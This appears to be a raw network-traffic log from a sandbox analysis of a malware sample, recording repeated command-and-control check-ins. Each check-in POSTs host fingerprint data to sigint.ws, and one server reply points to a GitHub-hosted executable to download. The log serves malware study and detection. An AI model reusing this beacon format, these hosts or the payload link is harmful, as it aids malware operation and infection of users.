                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              43 | 192.168.2.4 | 49817 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:19.458105087 CEST | 3437 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:19.643877029 CEST | 3437 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:19 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.4 | 49818 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:20.253472090 CEST | 3438 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:20.432085991 CEST | 3438 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.2.4 | 49819 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:20.991168976 CEST | 3439 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:21.171302080 CEST | 3439 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.4 | 49820 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:21.626939058 CEST | 3440 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:21.811204910 CEST | 3440 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.4 | 49821 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:22.195677996 CEST | 3440 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:22.377880096 CEST | 3441 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.4 | 49822 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:22.723931074 CEST | 3441 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:22.908207893 CEST | 3442 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.2.4 | 49823 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:23.851394892 CEST | 3442 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:24.035742044 CEST | 3443 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49758 | 172.67.152.230 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:53:21.494254112 CEST | 1052 | OUT | GET /760 HTTP/1.1
                                                                              Host: north.ac
                                                                              Connection: Keep-Alive
Jun 2, 2022 01:53:21.542336941 CEST | 1053 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Wed, 01 Jun 2022 23:53:21 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 02 Jun 2022 00:53:21 GMT
                                                                              Location: https://north.ac/760
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5YLW5dSqbg721IyKzsMf8P7ACjFZmvOi7AD%2FHAT86P9JYund1hvlywYDApRVqbaEC3kwr2hXCnVcLy7UQqMhYU0HKDAFEY5JZfIpWhl8H%2BfLoRglq5Ys9Kl1Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 714bde456979e68c-LHR
                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
50 | 192.168.2.4 | 49824 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:26.976248980 CEST | 3443 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:27.155880928 CEST | 3444 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 192.168.2.4 | 49825 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:27.778292894 CEST | 3444 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:27.957964897 CEST | 3444 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
52 | 192.168.2.4 | 49826 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:28.377083063 CEST | 3445 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:28.559840918 CEST | 3445 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:28 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
53 | 192.168.2.4 | 49827 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:28.893296003 CEST | 3446 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:29.072504997 CEST | 3446 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
54 | 192.168.2.4 | 49828 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:29.678179026 CEST | 3447 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:29.862505913 CEST | 3447 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
55 | 192.168.2.4 | 49829 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data
Jun 2, 2022 01:54:30.271644115 CEST | 3448 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
Jun 2, 2022 01:54:30.455723047 CEST | 3448 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:30 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              56 | 192.168.2.4 | 49830 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:30.708453894 CEST | 3449 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:30.890086889 CEST | 3449 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:30 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              57 | 192.168.2.4 | 49831 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:31.147058964 CEST | 3450 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:31.328547001 CEST | 3450 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              58 | 192.168.2.4 | 49832 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:31.829694033 CEST | 3451 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:32.013287067 CEST | 3451 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              59 | 192.168.2.4 | 49833 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:32.459145069 CEST | 3452 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:32.644280910 CEST | 3452 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:32 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              6 | 192.168.2.4 | 49764 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:53:40.683010101 CEST | 1547 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:53:40.865782022 CEST | 1548 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 34 61 0d 0a 3c 63 3e 31 30 30 30 30 30 37 30 30 31 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 69 71 6f 70 73 2f 61 6a 61 6a 61 6a 2f 72 61 77 2f 6d 61 69 6e 2f 66 69 6c 65 5f 32 32 36 31 33 2e 65 78 65 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 4a<c>1000007001https://github.com/neiqops/ajajaj/raw/main/file_22613.exe#<d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              60 | 192.168.2.4 | 49834 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:32.993751049 CEST | 3453 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
